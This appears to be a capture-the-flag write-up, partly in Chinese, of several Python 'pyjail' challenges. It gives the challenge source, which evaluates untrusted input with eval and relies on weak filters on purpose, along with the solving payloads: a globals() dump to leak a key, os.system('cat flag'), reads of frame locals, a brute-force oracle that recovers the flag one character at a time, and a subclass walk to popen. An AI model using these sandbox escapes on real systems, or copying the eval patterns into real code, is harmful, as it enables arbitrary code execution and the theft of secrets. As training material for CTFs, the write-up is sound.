| | | __ _| | _____ | | __ _| | _____ | | __ _| | _____ |
| | |/ _` | |/ / _ \ | |/ _` | |/ / _ \ | |/ _` | |/ / _ \ |
| | | (_| | < __/ | | (_| | < __/ | | (_| | < __/ |
| |_|\__,_|_|\_\___| |_|\__,_|_|\_\___| |_|\__,_|_|\_\___| |
| ''' |
| |
print(WELCOME)
print(
    "Now the program has two functions",
    "can you use dockerdoor",
    "1.func",
    "2.backdoor",
    sep="\n",
)
# One choice per run: every branch is followed by exit(0).
input_data = input("> ")
if input_data == "1":
    func()
elif input_data == "2":
    backdoor()
else:
    print("not found the choice")
exit(0)
| 1 |
| |
| globals() |
| |
| {'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7f090e9a0ac0>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': '/home/ctf/./server.py', '__cached__': None, 'key_9b1d015375213e21': 'a34af94e88aed5c34fb5ccfe08cd14ab', 'func': <function func at 0x7f090eb3fd90>, 'backdoor': <function backdoor at 0x7f090ea01fc0>, 'WELCOME': '\n'} |
| |
| 2 |
| |
| a34af94e88aed5c34fb5ccfe08cd14ab |
| |
| __import__("os").system('cat flag') |
| #it seems have a backdoor as `lake lake lake` |
| #but it seems be limited! |
| #can u find the key of it and use the backdoor |
| fake_key_var_in_the_local_but_real_in_the_remote = "[DELETED]" |
def func():
    """Read one line, reject it if longer than 6 characters, else eval and print it.

    Any exception raised during evaluation or printing is swallowed. Always
    returns None.
    """
    code = input(">")
    # The cap is tighter than in the previous level (6 instead of 9), but the
    # expression still runs with the full builtins in the module that holds
    # the admin key; the steps after this listing use a 6-character call.
    if len(code) > 6:
        print("you're hacker!")
        return None
    try:
        print(eval(code))
    except BaseException:
        pass
def backdoor():
    """Ask for the admin key; on a match, eval one further line without a length limit.

    Exceptions from the evaluation are swallowed. A wrong key prints
    "Nooo!!!!".
    """
    print("Please enter the admin key")
    key = input(">")
    # The key is a module-level variable of the same process that evaluates
    # untrusted input in func(); disclosure of the module's variables is
    # enough to pass this check.
    if key != fake_key_var_in_the_local_but_real_in_the_remote:
        print("Nooo!!!!")
        return
    code = input(">")
    try:
        print(eval(code))
    except BaseException:
        pass
| WELCOME = ''' |
| _ _ _ _ _ _ |
| | | ____ | | | | ____ | | | | ____ | | |
| | | / __ \| | _____ | | / __ \| | _____ | | / __ \| | _____ |
| | |/ / _` | |/ / _ \ | |/ / _` | |/ / _ \ | |/ / _` | |/ / _ \ |
| | | | (_| | < __/ | | | (_| | < __/ | | | (_| | < __/ |
| |_|\ \__,_|_|\_\___| |_|\ \__,_|_|\_\___| |_|\ \__,_|_|\_\___| |
| \____/ \____/ \____/ |
| ''' |
print(WELCOME)
print(
    "Now the program has two functions",
    "can you use dockerdoor",
    "1.func",
    "2.backdoor",
    sep="\n",
)
# One choice per run: every branch is followed by exit(0).
input_data = input("> ")
if input_data == "1":
    func()
elif input_data == "2":
    backdoor()
else:
    print("not found the choice")
exit(0)
1 > help() > server > 1 > help() > server
第一次 help() 中查看 server 时,环境变为 server.py,此时可以查看变量
ke_9d38ee7f31d6126d = '95c720690c2c83f0982ffba63ff87338'
NSSCTF{422d9d33-4c34-49ec-889c-a7fd7dd3f15a}
| |
| |
| |
| |
| import random |
| from io import StringIO |
| import sys |
| sys.addaudithook |
| |
# Names removed from the builtins namespace before the game starts.
BLACKED_LIST = ['compile', 'eval', 'exec', 'open']

# Saved first so the game itself can still evaluate the guess and read the
# flag file.
eval_func = eval
open_func = open

for m in BLACKED_LIST:
    __builtins__.__dict__.pop(m)
# __import__ is not on the list, so modules can still be imported from an
# evaluated expression.
| |
| |
def my_audit_hook(event, _):
    """Audit hook: raise RuntimeError for events on the process-spawning denylist.

    Denied: 'pty.spawn', 'os.system', 'os.exec', 'os.posix_spawn', 'os.spawn'
    and 'subprocess.Popen'. Every other event passes. The second hook
    argument is ignored.
    """
    # This is a denylist: anything not named here is allowed, including
    # imports, file opens and frame inspection. The answer after this listing
    # reads the secret through frame inspection without spawning anything.
    denied = set({'pty.spawn', 'os.system', 'os.exec', 'os.posix_spawn','os.spawn','subprocess.Popen'})
    if event not in denied:
        return
    raise RuntimeError('Operation banned: {}'.format(event))
| |
def guesser():
    """Play one round of the guessing game; return 1 on an exact match, else 0.

    A random integer in [1, 9999999999999] is drawn, one line is read from
    stdin and evaluated with empty globals and locals, and the result is
    compared with the drawn number. stdout is replaced by an in-memory buffer
    while the guess is evaluated and restored afterwards.
    """
    game_score = 0
    sys.stdout.write('Can u guess the number? between 1 and 9999999999999 > ')
    sys.stdout.flush()
    # The secret is a local of this frame, and the guess is evaluated while
    # this frame is still live. Empty dicts passed to eval() do not remove
    # builtins (eval() supplies them when '__builtins__' is missing), so the
    # evaluated expression is not isolated from the interpreter state.
    right_guesser_question_answer = random.randint(1, 9999999999999)
    challenge_original_stdout = sys.stdout
    # NOTE(review): sys.stderr is swapped here as well and is not put back on
    # any path in this function.
    sys.stdout, sys.stderr = StringIO(), StringIO()

    try:
        input_data = eval_func(input(''),{},{})
    except Exception:
        sys.stdout = challenge_original_stdout
        print("Seems not right! please guess it!")
        return game_score
    else:
        sys.stdout = challenge_original_stdout

    if input_data == right_guesser_question_answer:
        return game_score + 1
    return game_score
| |
| WELCOME=''' |
| _ _ __ _ _ __ _ _ __ |
| | | | |/ / | | | |/ / | | | |/ / |
| | | __ _| ' / ___ | | __ _| ' / ___ | | __ _| ' / ___ |
| | |/ _` | < / _ \ | |/ _` | < / _ \ | |/ _` | < / _ \ |
| | | (_| | . \ __/ | | (_| | . \ __/ | | (_| | . \ __/ |
| |_|\__,_|_|\_\___| |_|\__,_|_|\_\___| |_|\__,_|_|\_\___| |
| |
| ''' |
| |
def main():
    """Print the banner, run one guessing round and print the flag file on a win."""
    print(WELCOME)
    print('Welcome to my guesser game!')
    game_score = guesser()
    if game_score != 1:
        print('Guess game end!!!')
        return
    print('you are really super guesser!!!!')
    # open was deleted from builtins; the saved alias reads the flag file.
    print(open_func('flag').read())
| |
| if __name__ == '__main__': |
| sys.addaudithook(my_audit_hook) |
| main() |
| list(__import__('sys')._getframe(1).f_locals.values())[1] |
| MY_FLAG = "NSSCTF{fake_flag_in_local_but_really_in_The_remote}" |
| BLACED_KLIST = '"%&\',-/_:;@\\`{|}~*<=>[] \t\n\r' |
def my_safe_check(n):
    """Return True if *n* is acceptable input for my_safe_eval().

    Every character must have a code point below 0x7f and none of the
    characters in BLACED_KLIST may occur in *n*.
    """
    # Underscore, quotes, brackets, whitespace and most operators are in
    # BLACED_KLIST; letters, digits, parentheses, "." and a few others remain.
    if not all(ord(m) < 0x7f for m in n):
        return False
    return not any(m in n for m in BLACED_KLIST)
def my_safe_eval(m, my_func):
    """Evaluate ``<my_func name>(<m>)`` in a minimal namespace and print the result.

    Input rejected by my_safe_check() prints "Hacker!!!!". The expression is
    evaluated with a builtins dict that contains only *my_func* and with a
    global named ``flag`` bound to MY_FLAG. Any failure prints "Try again!".
    """
    if not my_safe_check(m):
        print("Hacker!!!!")
        return
    try:
        # The flag is deliberately placed inside the evaluated namespace, so
        # the character filter is the only thing between the input and the
        # secret. Methods of the str object remain callable, and a result
        # versus an error is visible to the caller.
        print(eval(f"{my_func.__name__}({m})", {"__builtins__": {my_func.__name__: my_func}, "flag": MY_FLAG}))
    except BaseException:
        print("Try again!")
| if __name__ == "__main__": |
| my_safe_eval(input("Payload:"), type) |
eval 的执行环境很干净,啥都没有,能用的只有数据类型的初始属性,并且所有魔法方法都不能用,意味着全程只能用 flag 中存在的东西操作 flag
| dir('') |
| ['__add__', '__class__', '__contains__', '__delattr__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__getitem__', '__getnewargs__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__iter__', '__le__', '__len__', '__lt__', '__mod__', '__mul__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__rmod__', '__rmul__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'capitalize', 'casefold', 'center', 'count', 'encode', 'endswith', 'expandtabs', 'find', 'format', 'format_map', 'index', 'isalnum', 'isalpha', 'isascii', 'isdecimal', 'isdigit', 'isidentifier', 'islower', 'isnumeric', 'isprintable', 'isspace', 'istitle', 'isupper', 'join', 'ljust', 'lower', 'lstrip', 'maketrans', 'partition', 'removeprefix', 'removesuffix', 'replace', 'rfind', 'rindex', 'rjust', 'rpartition', 'rsplit', 'rstrip', 'split', 'splitlines', 'startswith', 'strip', 'swapcase', 'title', 'translate', 'upper', 'zfill'] |
True == 1 False == 0 可用此来判断 'isalnum', 'isalpha', 'isascii', 'isdecimal', 'isdigit', 'isidentifier', 'islower', 'isnumeric', 'isprintable', 'isspace', 'istitle', 'isupper'
| flag.join(flag).split(flag).pop().split().pop(flag.join(flag).split(flag).pop({num}).isdigit()) |
type([])('test') == list('test') --> ['t', 'e', 's', 't']
bytes 按下标取出的单个元素,其数据类型为 int
a = b'test'
type(a) --> "bytes"
type(a[0]) --> "int"
a[0] ^ 1 --> 117
来自学长部分 payload
通过 flag.join(flag).split(flag) 可以得到单个字符构成的 list
通过 list.pop() 弹出元素,然后切割 flag,确定弹出元素所在的位置
可以通过分割后 list 元素的数量判断重复次数,通过单个元素的长度判断 单个字符的位置
到最后就只能硬猜了,运气好,就猜了 4 次
| type(type(flag).mro())(type(type(flag).mro())(flag).pop({i}).encode()).remove({guess}) |
i => flag 单字符位置
guess => num 猜测字符的 ascii 码
当相等时 return NoneType,当不相等时 报错,然后开始爆破
| type(flag.split())(type(flag.split())(flag).pop({}).encode()).remove({}) |
# Evaluates one line with an empty builtins dict for both globals and locals.
# Emptying __builtins__ removes the builtin names only: objects created by
# literals still expose their classes, so this is not an isolation boundary
# (the answer that follows on the page starts from an empty tuple).
print(
    eval(
        input("code> "),
        {"__builtins__": {}},
        {"__builtins__": {}},
    )
)
| ().__class__.__base__.__subclasses__()[144].__init__.__globals__['popen']('cat flag').read() |
# Keep at most the first 72 characters of the line.
inp = input("code> ")[:72]
# A double underscore anywhere in the input is refused; everything else is
# evaluated with an empty builtins dict for both globals and locals.
if "__" not in inp:
    print(eval(inp, {"__builtins__": {}}, {"__builtins__": {}}))
else:
    print("Nope")
| ().__class__.__base__.__subclasses__()[119].get_data('', path=r'flag.txt') |
# Lower-cases the input, deletes every a-z and 0-9 character, keeps the first
# 130 characters of what is left and evaluates that with the full builtins.
# Stripping ASCII letters and digits is the only restriction: every other
# character reaches eval() unchanged.
eval(
    (
        __import__("re").sub(r'[a-z0-9]', '', input("code > ").lower())
    )[:130]
)